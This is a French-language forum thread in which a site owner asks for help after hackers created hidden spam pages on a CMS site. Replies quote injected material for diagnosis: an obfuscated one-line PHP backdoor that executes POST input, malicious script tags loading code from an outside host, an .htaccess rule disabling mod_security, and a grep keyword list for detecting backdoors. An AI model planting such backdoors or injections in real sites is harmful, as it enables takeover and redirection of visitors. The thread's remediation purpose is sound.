Site hacké, pages invisibles

[amrani13]

Bonjour,

Je me permets de poster ici car je n'ai pas trouvé de rubrique plus adéquate.

Mon site s'est fait hacké depuis 1 mois ou plus, des intrus ont crées des pages mais je parviens pas à les trouver sur le ftp pour les supprimer ...

j'ai vraiment tout fouillé du coup je me demande comment ont ils pu faire ?

Voici quelques exemples de pages :
-http://smartphonx.fr/paid-web-hosting
-http://smartphonx.fr/namecheap-discount-coupons
-http://smartphonx.fr/sweden-vps
-http://smartphonx.fr/dedicated-server-florida

Il y en a une bonne vingtaine, en plus elles sont linkés et visités. Est ce que ca peut proser un problème niveau seo (pour le moment rien remarqué) ?



Merci pour votre aide

 

[loubet]

le fichier .htaccess a-t-il été modifié ?

 

[amrani13]

J'avais trouvé ce code que j'ai viré depuis (je sais pas si c'est lié)

<IfModule mod_security.c>
SecFilterEngine Off
SecFilterScanPOST Off
</IfModule>

 

[spout]

Cherche dans tout ton WP: eval(), base64_decode(), gzinflate(), str_rot13()
Les URLs hackées sont servies via du PHP.

 

[madri2]

un backdoor peut se cacher sans qu'il n'y ait de eval ou autre
il est impossible de trouver un backdoor uniquement en faisant une recherche

si c'est un cms, vaut mieux le réinstaller (dans un nouveau dossier), et sinon faut vérifier chaque fichier php un par un qu'il ne contient pas de code pas original

 

[amrani13]

merci pour vos réponses, il s'agit de quels fichiers ? eval(), base64_decode(), gzinflate(), str_rot13()

 

[amrani13]

un backdoor peut se cacher sans qu'il n'y ait de eval ou autre
il est impossible de trouver un backdoor uniquement en faisant une recherche

si c'est un cms, vaut mieux le réinstaller (dans un nouveau dossier), et sinon faut vérifier chaque fichier php un par un qu'il ne contient pas de code pas original

ca va demandé du boulot mais je ne pense pas avoir le choix

 

[madri2]

si c'est un cms, faut vérifier chaque thème et plugin, s'il est à jour et s'il existe toujours (s'il a été supprimé c'est pas bon singe)

 

[amrani13]

J'avais aussi un problème avec un site du meme serveur, le code suivant avait été ajouté dans le header :

<script type='text/javascript' src="http://gccanada.com/jquery.js"></script>
<script type='text/javascript' src="http://gccanada.com/jquery.js"></script>

Ca généré une redirection de tous les internautes vers 2 ou 3 sites étranger et parfois meme vers google ...

 

[spout]

Oui mais dans son cas, ses pages piratées sont bien servies par PHP. Un grep ça prend même pas 30 sec..., autant essayer ça en premier.

 

[madri2]

sauf que grep n'est pas suffisant comme j'ai dit

 

[madri2]

pour info, voici un backdoor :
<?php $k="ass"."ert"; $k(${"_PO"."ST"} ['yt']);?>

 

[amrani13]

Pour info c'est quoi un grep ?

 

[ybet]

Bonjour,
Mon site s'est fait hacké depuis 1 mois ou plus, des intrus ont crées des pages mais je parviens pas à les trouver sur le ftp pour les supprimer ...

Forcément que tu ne les trouve pas en FTP puisque tu utilise un CMS: ils sont simplement repris dans les tables MySQL.

Ces BROL de CMS: facile à installer, facile à configurer, facile à paramétrer, facile à mettre à jour et ... facile à pirater quand ils ne sont pas mis à jour.

Une solution est effectivement de réinstaller complètement le site (à condition d'avoir une sauvegarde sur ton PC de la base de donnée et des différents fichiers). Pourtant, si un pirateur est passé: la faille existe encore -> retransfert et MISE à JOUR.
2. analyse via les logs du serveur / hébergement à la date du piratage pour comprendre d'où ca vient: IP et fichiers attaqués. -> interdiction de la plage IP qui a créé le problème par htaccess ou (serveur) IPtable.

Comme technicien informatique: quand un PC se prend des bestioles, je vérifie manuellement les programmes bizarres installés, quand ca me paraît un peu plus étrange: utilisation de logiciels spécialisés et quand je doute -> réinstall du PC. C'est la même chose pour un hébergement: en cas de doute -> réinstall. (j'ai la chance de ne pas utiliser de CMS mais aussi de bloquer tout ce qui ne me semble pas catholique .... : un jour j'en ais eut mare des bricoleurs).

Dans ton cas: pour essayer de corriger tu va devoir vérifier quasiment tous les fichiers maîtres ... index, catégorises, articles. Tous les fichiers (pardon contenu de tables) contenu. Tous les fichiers de navigation ... (de nouveau contenu des tables) .... Suis plutôt doué pour les bestioles mais manuellement, c'est quasiment impossible.

J'avais aussi un problème avec un site du meme serveur, le code suivant avait été ajouté dans le header :

<script type='text/javascript' src="http://gccanada.com/jquery.js"></script>
<script type='text/javascript' src="http://gccanada.com/jquery.js"></script>

Ca généré une redirection de tous les internautes vers 2 ou 3 sites étranger et parfois même vers google ...

et ouvrent d'autres portes à d'autres bestioles. Et si tu as déjà trouver le site gccanada BLOQUE tous les accès par htaccess à partir de ce site.
Par contre, ce qui est génial: trouver un antivirus (même payant) pour LINUX ... impossible. Le monde "libre" est tellement persuadé qu'ils n'ont pas de risques :roll:

Reste à comprendre (comment interdire une plage de serveurs parasites): adresse du site 209.237.151.17 Hébergeur américain Hypersurf Internet Services, Inc (USA) site: -hypersurf.com avec plage d'adresse 209.237.0.0 - 209.237.63.255 Encore un hébergeur à supprimer. CIDR: 209.237.0.0/18
en htaccess:
Deny from 209.237.0.0/18
en IPTABLE: iptables -I INPUT -s 209.237.0.0/18 -j DROP

 

[spout]

8h plus tard et tjs pas trouvé ? 8O